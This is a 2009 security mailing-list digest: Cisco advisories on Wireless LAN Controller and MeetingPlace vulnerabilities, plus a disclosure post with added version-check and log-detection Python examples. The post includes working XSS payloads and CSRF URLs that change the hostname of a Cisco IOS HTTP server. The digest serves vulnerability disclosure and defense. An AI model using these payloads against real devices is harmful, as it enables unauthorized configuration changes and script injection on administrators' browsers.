|          |                 | release  |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
--- End Message ---
--- Begin Message ---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Multiple Vulnerabilities in Cisco Wireless
LAN Controllers
Advisory ID: cisco-sa-20090204-wlc
http://www.cisco.com/warp/public/707/cisco-sa-20090204-wlc.shtml
Revision 1.0
For Public Release 2009 February 04 1600 UTC (GMT)
Summary
=======
Multiple vulnerabilities exist in the Cisco Wireless LAN Controllers
(WLCs), Cisco Catalyst 6500 Wireless Services Modules (WiSMs), and
Cisco Catalyst 3750 Integrated Wireless LAN Controllers. This security
advisory outlines details of the following vulnerabilities:
* Denial of Service Vulnerabilities (total of three)
* Privilege Escalation Vulnerability
These vulnerabilities are independent of each other.
Cisco has released free software updates that address these
vulnerabilities.
There are no workarounds available for these vulnerabilities.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20090204-wlc.shtml.
Affected Products
=================
Vulnerable Products
+------------------
The following products and software versions are affected for each
vulnerability.
Denial of Service Vulnerabilities
+--------------------------------
Two denial of service (DoS) vulnerabilities affect software versions
4.2 and later. All Cisco Wireless LAN Controller (WLC) platforms are
affected.
A third DoS vulnerability affects software versions 4.1 and later. The
following platforms are affected by this vulnerability:
* Cisco 4400 Series Wireless LAN Controllers
* Cisco 4100 Series Wireless LAN Controllers
* Cisco Catalyst 6500 Series/7600 Series Wireless Services Module
(WiSM)
* Cisco Catalyst 3750 Series Integrated Wireless LAN Controllers
Note: The Cisco Wireless LAN Controller Modules supported on Cisco
2800 and 3800 series Integrated Services Routers are not vulnerable.
The Cisco 2000 and 2100 Series Wireless LAN Controllers are also not
affected by this vulnerability.
Privilege Escalation Vulnerability
+---------------------------------
Only WLC software version 4.2.173.0 is affected by this vulnerability.
Determination of Software Versions
+---------------------------------
To determine the WLC version that is running in a given environment, use
one of the following methods:
* In the web interface, choose the Monitor tab, click Summary in
the left pane, and note the Software Version.
* From the command-line interface, type "show sysinfo" and note the
Product Version, as shown in the following example:
(Cisco Controller) >show sysinfo
Manufacturer's Name.. Cisco Systems Inc.
Product Name......... Cisco Controller
Product Version...... 5.1.151.0
RTOS Version......... Linux-2.6.10_mvl401
Bootloader Version... 4.0.207.0
Build Type........... DATA + WPS
<output suppressed>
Use the "show wism module <module number> controller 1 status" command
on a Cisco Catalyst 6500 Series/7600 Series switch if using a WiSM, and
note the Software Version, as demonstrated in the following example:
Router#show wism mod 3 controller 1 status
WiSM Controller 1 in Slot 3
Operational Status of the Controller : Oper-Up
Service VLAN                         : 192
Service Port                         : 10
Service Port Mac Address             : 0011.92ff.8742
Service IP Address                   : 192.168.10.1
Management IP Address                : 192.168.1.123
Software Version                     : 5.1.151.0
Port Channel Number                  : 288
Allowed vlan list                    : 30,40
Native VLAN ID                       : 40
WCP Keep Alive Missed                : 0
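An added example, not part of the Cisco advisory: a Python check that pulls the Product Version or Software Version out of the two command outputs shown above and compares the running build with the first-fixed versions given in this advisory's "Software Versions and Fixes" table and its privilege escalation note. The table is transcribed into the FIXES dictionary (the 5.1 "Contact TAC" entry for CSCsq44516 is treated as affected); the WiSM sample output is constructed in the layout of "show wism module 3 controller 1 status".

```python
import re
from typing import Dict, Optional, Tuple

# First-fixed versions per Cisco Bug ID, transcribed from the "Software
# Versions and Fixes" table of cisco-sa-20090204-wlc. Per release train:
# a build string is the first fixed version, "migrate" means the train has
# no fix and the advisory points to another train, "tac" means the advisory
# says to contact TAC, and None means the train is not vulnerable.
FIXES: Dict[str, Dict[str, Optional[str]]] = {
    "CSCsq44516": {"4.1": "migrate", "4.2": "4.2.173.0", "5.0": "migrate",
                   "5.1": "tac", "5.2": None},
    "CSCsm82364": {"4.1": "migrate", "4.2": "4.2.112.0", "5.0": None,
                   "5.1": None, "5.2": "5.2.157.0"},
    "CSCso60979": {"4.1": "migrate", "4.2": "4.2.117.0", "5.0": "migrate",
                   "5.1": None, "5.2": None},
}
# Recommended release per train, from the same table.
RECOMMENDED = {"4.1": "4.2.176.0", "4.2": "4.2.176.0",
               "5.0": "5.2.157.0", "5.2": "5.2.157.0"}
# The privilege escalation bug affects exactly one build (advisory text).
PRIV_ESC = ("CSCsv62283", "4.2.173.0")

# Matches "Product Version...... 5.1.151.0" (show sysinfo) as well as
# "Software Version : 5.1.151.0" (show wism ... status); the colon is optional.
VERSION_RE = re.compile(r"(?:Product|Software) Version[\s.]*:?\s*(\d+(?:\.\d+){1,3})")


def extract_version(cli_output: str) -> Optional[str]:
    """Return the controller version found in CLI output, or None."""
    m = VERSION_RE.search(cli_output)
    return m.group(1) if m else None


def as_tuple(version: str) -> Tuple[int, ...]:
    return tuple(int(p) for p in version.split("."))


def assess(version: str) -> Dict[str, str]:
    """Per Bug ID, state whether the build is affected and what the advisory recommends."""
    train = ".".join(version.split(".")[:2])
    verdict: Dict[str, str] = {}
    for bug, per_train in FIXES.items():
        if train not in per_train:
            verdict[bug] = "train %s not listed in the advisory" % train
            continue
        fix = per_train[train]
        if fix is None:
            verdict[bug] = "not vulnerable"
        elif fix == "migrate":
            verdict[bug] = "affected; no fix in %s, migrate to %s" % (train, RECOMMENDED[train])
        elif fix == "tac":
            verdict[bug] = "affected; contact TAC"
        elif as_tuple(version) >= as_tuple(fix):
            verdict[bug] = "fixed (first fixed in %s)" % fix
        else:
            verdict[bug] = "affected; upgrade to %s or later" % fix
    bug, build = PRIV_ESC
    # 4.2.173.0 is the first fix for CSCsq44516 but the only build exposed to
    # CSCsv62283, which is why the table recommends 4.2.176.0 for the 4.2 train.
    verdict[bug] = ("affected; upgrade to %s" % RECOMMENDED["4.2"]
                    if version == build else "not vulnerable")
    return verdict


# Sample "show sysinfo" output as printed in the advisory above.
SHOW_SYSINFO = """\
(Cisco Controller) >show sysinfo
Manufacturer's Name.. Cisco Systems Inc.
Product Name......... Cisco Controller
Product Version...... 5.1.151.0
RTOS Version......... Linux-2.6.10_mvl401
"""
# Constructed WiSM status output (only the relevant lines).
SHOW_WISM = """\
WiSM Controller 1 in Slot 3
Operational Status of the Controller : Oper-Up
Software Version                     : 4.2.173.0
"""

if __name__ == "__main__":
    for label, output in (("show sysinfo", SHOW_SYSINFO), ("show wism", SHOW_WISM)):
        version = extract_version(output)
        print("%s -> %s" % (label, version))
        for bug, text in assess(version).items():
            print("  %s: %s" % (bug, text))
```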
Products Confirmed Not Vulnerable
+--------------------------------
No other Cisco products are currently known to be affected by these
vulnerabilities.
Details
=======
Cisco Wireless LAN Controllers (WLCs), Cisco Catalyst 6500 Wireless
Services Modules (WiSMs), and Cisco Catalyst 3750 Integrated Wireless
LAN Controllers are responsible for system-wide wireless LAN functions,
such as security policies, intrusion prevention, RF management, quality
of service (QoS), and mobility.
These devices communicate with Controller-based Access Points over any
Layer 2 (Ethernet) or Layer 3 (IP) infrastructure using the Lightweight
Access Point Protocol (LWAPP).
This Security Advisory describes multiple distinct vulnerabilities in
the WLCs, WiSMs, and the Cisco Catalyst 3750 Integrated WLCs. These
vulnerabilities are independent of each other.
Denial of Service Vulnerabilities
+--------------------------------
These vulnerabilities are documented in the following Cisco Bug IDs and
have been assigned the following Common Vulnerabilities and Exposures
(CVE) identifiers:
* CSCsq44516 - CVE-2009-0058
Web authentication is a Layer 3 security feature that causes the
controller to drop IP traffic (except DHCP and DNS related packets)
from a particular client until that client has correctly supplied
a valid username and password. An attacker may use a vulnerability
scanner to cause the device to stop servicing web authentication
or cause a reload of the device. The following error messages may
appear on the console during an active attack:
SshPmStMain/pm_st_main.c:1954/
ssh_pm_st_main_batch_addition_result:
Failed to add rule to the engine:
restoring old state
SshEnginePmApiPm/engine_pm_api_pm.c:1896/
ssh_pme_enable_policy_lookup:
Could not allocate message
* CSCsm82364 - CVE-2009-0059
An attacker may cause a device reload when sending a malformed post
to the web authentication "login.html" page. The following error
messages may appear on the WLC console during this attack:
Cisco Crash Handler
Signal generated during a signal 11,
count 193
Memory 0x14ef1e44 has been freed!
Note: A crash file is not generated during this attack.
* CSCso60979 - CVE-2009-0061
Affected Cisco WLC, WiSM and Catalyst 3750 Wireless LAN Controller
models are vulnerable to a DoS condition that is triggered by the
receipt of certain IP packets. Upon receiving these IP packets, the
affected device may become unresponsive and require a reboot to
recover.
Note: This vulnerability affects software versions 4.1 and later in
the Cisco 4400 series WLCs, Cisco Catalyst 6500 WiSM, and the Cisco
Catalyst 3750 Integrated Wireless LAN Controllers. Cisco 4100, 2100,
and 2000 series WLCs are not affected by this vulnerability.
Privilege Escalation Vulnerability
+---------------------------------
A privilege escalation vulnerability exists only in WLC software version
4.2.173.0, and could allow a restricted user (i.e., Lobby Admin) to gain
full administrative rights on the affected system.
Note: Wireless network users are not affected by this vulnerability.
This vulnerability is documented in Cisco Bug ID CSCsv62283 and has
been assigned the Common Vulnerabilities and Exposures (CVE) identifier
CVE-2009-0062.
Vulnerability Scoring Details
+----------------------------
Cisco has provided scores for the vulnerabilities in this advisory based
on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in
this Security Advisory is done in accordance with CVSS version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of the
vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
* Certain packets may cause WebAuth services to hang or reload the
device (CSCsq44516)
CVSS Base Score - 6.1
Access Vector - Adjacent Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 5.0
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* Crash handling invalid post for webauth (CSCsq44516)
CVSS Base Score - 6.1
Access Vector - Adjacent Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 5.0
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* WLC TSEC driver may hang or crash the device (CSCso60979)
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* Local Management Users may obtain full admin rights (CSCsv62283)
CVSS Base Score - 9.0
Access Vector - Network
Access Complexity - Low
Authentication - Single
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.8
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the denial of service vulnerabilities may
cause the affected device to hang or reload. Repeated exploitation
could result in a sustained DoS condition. The privilege escalation
vulnerability may allow an authenticated user to obtain full
administrative rights on the affected system.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
+------------+----------+----------------+----------------+
| Bug ID     | Affected | First Fixed    | Recommended    |
|            | Release  | Version        | Release        |
|------------+----------+----------------+----------------|
| CSCsq44516 | 4.1      | Migrate to 4.2 | 4.2.176.0      |
|            | 4.2      | 4.2.173.0      | 4.2.176.0      |
|            | 5.0      | Migrate to 5.2 | 5.2.157.0      |
|            | 5.1      | Contact TAC    | Contact TAC    |
|            | 5.2      | Not vulnerable | Not vulnerable |
|------------+----------+----------------+----------------|
| CSCsm82364 | 4.1      | Migrate to 4.2 | 4.2.176.0      |
|            | 4.2      | 4.2.112.0      | 4.2.176.0      |
|            | 5.0      | Not vulnerable | Not vulnerable |
|            | 5.1      | Not vulnerable | Not vulnerable |
|            | 5.2      | 5.2.157.0      | 5.2.157.0      |
|------------+----------+----------------+----------------|
| CSCso60979 | 4.1      | Migrate to 4.2 | 4.2.176.0      |
|            | 4.2      | 4.2.117.0      | 4.2.176.0      |
|            | 5.0      | Migrate to 5.2 | 5.2.157.0      |
|            | 5.1      | Not vulnerable | Not vulnerable |
|            | 5.2      | Not vulnerable | Not vulnerable |
|------------+----------+----------------+----------------|
| CSCsv62283 | 4.1      | Not vulnerable | Not vulnerable |
|            | 4.2      | 4.2.174.0      | 4.2.176.0      |
|            | 5.0      | Not vulnerable | Not vulnerable |
|            | 5.1      | Not vulnerable | Not vulnerable |
|            | 5.2      | Not vulnerable | Not vulnerable |
+------------+----------+----------------+----------------+
Note: Customers running 4.1M WLC mesh code, using Cisco Wireless 1510
Access Points (APs) are recommended to migrate to release 4.2.176.0.
Customers running 4.1 mesh code, using Cisco Wireless 1520 APs are
recommended to migrate to 5.2 or later.
Workarounds
===========
There are no workarounds for any of these vulnerabilities.
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature
sets they have purchased. By installing, downloading, accessing
or otherwise using such software upgrades, customers agree to be
bound by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for software
upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through their
regular update channels. For most customers, this means that upgrades
should be obtained through the Software Center on Cisco's worldwide
website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through prior
or existing agreements with third-party support organizations, such
as Cisco Partners, authorized resellers, or service providers should
contact that support organization for guidance and assistance with the
appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or fix
is the most appropriate for use in the intended network before it is
deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco service
contract, and customers who purchase through third-party vendors but are
unsuccessful in obtaining fixed software through their point of sale
should acquire upgrades by contacting the Cisco Technical Assistance
Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to a
free upgrade. Free upgrades for non-contract customers must be requested
through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory. These
vulnerabilities were found during internal testing and during the
resolution of customer support cases.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY
ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or paraphrase of the text of this document that omits
the distribution URL in the following section is an uncontrolled copy,
and may lack important information or contain factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20090204-wlc.shtml
In addition to worldwide web posting, a text version of this notice is
clear-signed with the Cisco PSIRT PGP key and is posted to the following
e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on mailing
lists or newsgroups. Users concerned about this problem are encouraged
to check the above URL for any updates.
Revision History
================
+------------------------------------------------------------+
| Revision 1.0 | 2009-February-04 | Initial public release. |
+------------------------------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security
notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt.
+--------------------------------------------------------------------
Copyright 2008 - 2009 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
Updated: Feb 04, 2009 Document ID: 108336
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iEYEARECAAYFAkmJxSEACgkQ86n/Gc8U/uB4XQCfadDoSJbA5K+0GujUY02Rj1Ua
xnUAn0nc+bNHTzHwD298ai3ZW/JWKWaU
=waFY
-----END PGP SIGNATURE-----
--- End Message ---
--- Begin Message ---
There was a Cisco Product Security Incident Response Team (PSIRT)
advisory recently concerning some XSS/CSRF holes in the IOS..
quote{
Document ID: 98605
http://www.cisco.com/warp/public/707/cisco-sr-20090114-http.shtml
Revision 1.0
For Public Release 2009 January 14 1600 UTC (GMT)
Cisco Response:
"Two separate Cisco IOS® Hypertext Transfer Protocol (HTTP) cross-site
scripting (XSS) vulnerabilities have been reported to Cisco [...]
This response covers two separate cross-site scripting vulnerabilities
within the Cisco IOS Hypertext Transfer Protocol (HTTP) server
(including HTTP secure server - hereafter referred to as purely HTTP
Server) and applies to all Cisco products that run Cisco IOS Software
versions 11.0 through 12.4 with the HTTP server enabled.
};
According to this advisory these holes were patched in 12.4(15)T8 and
12.4(23).
However I found that the Cisco IOS (12.4(23)) HTTP Server is still
prone to multiple cross-site scripting vulnerabilities because it fails
to sufficiently sanitize user-supplied data.
The attacker may leverage these issues to execute arbitrary script code
in the browser of an unsuspecting user in the context of the affected site.
Proof of concept:
furchtbar#sh ver | i IOS
Cisco IOS Software, C2600 Software (C2600-ADVSECURITYK9-M), Version
12.4(23), RELEASE SOFTWARE (fc1)
furchtbar#show ip http server status | include status
HTTP server status: Enabled
HTTP secure server status: Enabled
furchtbar#sh ip int br | i up
FastEthernet0/0 192.168.1.2 YES NVRAM
up up
...
[XSS]
http://192.168.1.2/level/15/exec/-/"><body onload=alert("bug")>
http://192.168.1.2/level/15/exec/-/"><iframe onload=alert("bug")>
http://192.168.1.2/exec/"><body onload="alert('bug');">
[CSRF]
http://192.168.1.2/level/15/exec/-/"><body
onload=window.location='http://192.168.1.2/level/15/configure/-/hostname/BUGGY/CR'>
http://192.168.1.2/exec/"><iframe
src="http://192.168.1.2/level/15/configure/-/hostname/BUGGY/CR">
Best Regards,
Zloss
--- End Message ---
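Added example, not part of Zloss's post above and not Cisco code: a small log-side detector for the two request shapes the post demonstrates. The XSS probes put markup into an /exec/ command path; the CSRF probes drive the victim's browser to a /level/<n>/configure/ path, and any GET to such a path applies a configuration command, so every hit on that pattern is worth verifying. The log format ("client method path status", one request per line) and the sample lines are constructed for the example; browsers percent-encode the quote and angle-bracket characters, so the probes appear encoded and are decoded twice to catch double encoding.

```python
import re
from urllib.parse import unquote

# Constructed sample (not from the post): one HTTP request per line in a
# minimal "client method path status" format, as a proxy or the device's own
# logging might record it. The probes appear percent-encoded, as a browser
# would send them.
SAMPLE_LOG = """\
10.0.0.5 GET /level/15/exec/-/show/version/CR 200
10.0.0.9 GET /level/15/exec/-/%22%3E%3Cbody%20onload=alert(%22bug%22)%3E 200
10.0.0.9 GET /level/15/configure/-/hostname/BUGGY/CR 200
10.0.0.7 GET /exec/%22%3E%3Ciframe%20onload=alert(%22bug%22)%3E 200
10.0.0.3 GET /level/1/exec/-/show/clock/CR 200
"""

_LOG_RE = re.compile(
    r"^(?P<client>\S+)\s+(?P<method>\S+)\s+(?P<path>\S+)\s+(?P<status>\d{3})$"
)
# Markup that has no business in an IOS command path: tag delimiters, quotes,
# inline event handlers (onload=, onerror=, ...) and javascript: URLs.
_MARKUP_RE = re.compile(r"""[<>"']|\bon[a-z]+\s*=|javascript:""", re.IGNORECASE)
_CONFIGURE_RE = re.compile(r"^/level/\d+/configure/")
_EXEC_RE = re.compile(r"/exec/")


def classify(path):
    """Classify one request path sent to the IOS HTTP server.

    'config-change'    : a /level/<n>/configure/... path. A GET to such a path
                         applies a configuration command, which is what the
                         CSRF probes in the post target.
    'reflected-markup' : an /exec/ path carrying markup, the shape of the XSS
                         probes in the post.
    None               : an ordinary command path.
    """
    decoded = unquote(unquote(path))  # decode twice to catch double encoding
    if _CONFIGURE_RE.match(decoded):
        return "config-change"
    if _EXEC_RE.search(decoded) and _MARKUP_RE.search(decoded):
        return "reflected-markup"
    return None


def scan(log_text):
    """Return (client, kind, path) for every log line that classify() flags,
    skipping lines that do not match the expected format."""
    hits = []
    for line in log_text.splitlines():
        m = _LOG_RE.match(line)
        if m is None:
            continue
        kind = classify(m["path"])
        if kind is not None:
            hits.append((m["client"], kind, m["path"]))
    return hits


if __name__ == "__main__":
    for client, kind, path in scan(SAMPLE_LOG):
        print(f"{client:12} {kind:17} {path}")
```

A 'reflected-markup' hit only shows that someone probed; whether the running build is vulnerable is a separate question. A 'config-change' hit from a browser session is the one to chase, since it shows a configuration command being applied over HTTP. Independently of the patch level, an HTTP server that is not needed should be disabled (no ip http server / no ip http secure-server), and one that is needed should be restricted to management sources with ip http access-class.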
--- Begin Message ---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Cisco Unified MeetingPlace Web Conferencing
Authentication Bypass Vulnerability
Advisory ID: cisco-sa-20090225-mtgplace
Revision 1.0
For Public Release 2009 February 25 1600 UTC (GMT)
+---------------------------------------------------------------------
Summary
=======
Cisco Unified MeetingPlace Web Conferencing servers may contain an
authentication bypass vulnerability that could allow an
unauthenticated user to gain administrative access to the
MeetingPlace application. Cisco has released free software updates
that address this vulnerability.
This advisory is posted at:
http://www.cisco.com/warp/public/707/cisco-sa-20090225-mtgplace.shtml
Affected Products
=================
Cisco Unified MeetingPlace conferencing solution provides
functionality that allows organizations to host integrated voice,
video, and web conferencing. The solution is deployed on-network,
behind the firewall and integrated directly into an organization's
private voice/data networks and enterprise applications. Cisco
Unified MeetingPlace servers can be deployed so that the server is
accessible from the Internet, allowing external parties to
participate in meetings.
Vulnerable Products
+------------------
Cisco Unified MeetingPlace Web Conferencing servers running software
versions 6.0 and 7.0 may be affected by this vulnerability.
Products Confirmed Not Vulnerable
+--------------------------------
Cisco Unified MeetingPlace Web Conferencing servers not running 6.0
or 7.0 software are not affected by this vulnerability.
Cisco Unified MeetingPlace Express is not affected by this
vulnerability.
No other Cisco products are currently known to be affected by this
vulnerability.
Details
=======
The Cisco Unified MeetingPlace Web Conferencing server may contain a
vulnerability that could allow an unauthenticated user to use a
crafted URL to bypass the authentication mechanisms of the server. If
successful, the user could gain full administrative access to the
Cisco Unified MeetingPlace application.
This vulnerability is documented in Cisco Bug ID CSCsv65815 and has
been assigned Common Vulnerability and Exposures (CVE) ID CVE-2009-0614.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
CSCsv65815 - Authentication Bypass in MeetingPlace Web Server
CVSS Base Score - 9
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Partial
Integrity Impact - Partial
Availability Impact - Complete
CVSS Temporal Score - 7.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the vulnerability may result in
unauthorized access to the administrative functions of the Cisco
Unified MeetingPlace application.
Software Versions and Fixes
===========================
This vulnerability is fixed in Cisco Unified MeetingPlace Web
Conferencing software version 6.0(517.0) also known as Maintenance
Release 4 (MR4) for the 6.0 release, and version 7.0(2) also known as
Maintenance Release 1 (MR1) for the 7.0 release.
The latest versions of Cisco MeetingPlace software can be downloaded
from:
http://tools.cisco.com/support/downloads/go/Redirect.x?mdfid=278875240
The Cisco Unified MeetingPlace Web Server software is available at:
http://tools.cisco.com/support/downloads/go/Model.x?mdfid=278816725&mdfLevel=Software%20Version/Option&treeName=Voice%20and%20Unified%20Communications&modelName=Cisco%20Unified%20MeetingPlace%20Web%20Conferencing&treeMdfId=278875240
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Workarounds
===========
There are no workarounds for this vulnerability.
Obtaining Fixed Software
========================
Cisco has released free software updates that address this
vulnerability. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at:
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html
or as otherwise set forth at Cisco.com Downloads at:
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to:
http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various languages.
Exploitation and Public Announcements
=====================================
This vulnerability was reported to Cisco by National Australia Bank's
Security Assurance team.
Cisco would like to thank the National Australia Bank's Security
Assurance team for the discovery and reporting of the vulnerability.
The Cisco PSIRT is not aware of any malicious use of the
vulnerability described in this advisory.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20090225-mtgplace.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+--------------+------------------+-------------------------+
| Revision 1.0 | 2009-February-25 | Initial public release. |
+--------------+------------------+-------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at:
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco security notices.
